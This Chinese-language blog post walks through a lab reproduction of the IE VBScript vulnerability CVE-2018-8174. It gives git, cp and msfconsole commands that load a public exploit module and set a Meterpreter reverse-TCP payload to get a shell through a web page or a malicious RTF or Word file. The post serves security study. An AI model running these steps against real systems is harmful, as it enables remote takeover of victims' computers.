安全响应 | CVE-2018-8174 “双杀”0day漏洞复现

0x00 | 漏洞描述

最近360核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用0day漏洞的APT攻击,捕获到了全球首例利用浏览器0day漏洞的新型Office文档攻击,我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。

0x01 | 漏洞细节


可以利用计算器入侵你电脑,由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。

0x02 | 环境准备


环境准备:
攻击机:Kali 2.0 (2019.4)
靶机:Windows XP
环境网络:
攻击机:git项目库,使用metasploit进行渗透测试
靶机: 
攻击机IP:10.0.0.1/8 交换机:10.0.0.254
靶机IP:10.0.0.3/8  交换机:10.0.0.254
#基于冰崖B区服务器cdn

0x03 | 漏洞复现


\0x00 环境准备

\0x01 git CVE-2018-8174利用模块至本地

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

\0x02 将CVE-2018-8174.rtf复制到exploits目录下

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

\0x03 将CVE-2018-8174.rb复制到windows/fileformat/目录下

cp CVE-2018-8174.rb 
/usr/share/metasploit-framework/modules/exploits/windows/fileformat/

\0x04 环境准备就绪打开msf进行配置

msfconsole #打开msf
use exploit/windows/fileformat/CVE-2018-8174 #加载modules
set payload windows/meterpreter/reverse_tcp #设置payload
set srvhost Your Web #设置srvhost
set lhost Your IP #设置IP 
exploit #开始监听!

在这里我要说下,有些人会遇到模块不存在的提示,在这里我想说一句kal

i我生吃you mom???,咳咳,直接reload_all解决一切问题


\0x05 打开靶机IE访问目的地址返回getshell

\0x06 或者复制/root/.msf4/local目录中的 msf.rtf 文件到目标主机上使用word文档打开

0x05 | 作者的话


完了迷上挖洞了

扫码关注我们!

发布了16 篇原创文章 · 获赞 9 · 访问量 6574

猜你喜欢

转载自blog.csdn.net/weixin_42608762/article/details/95937568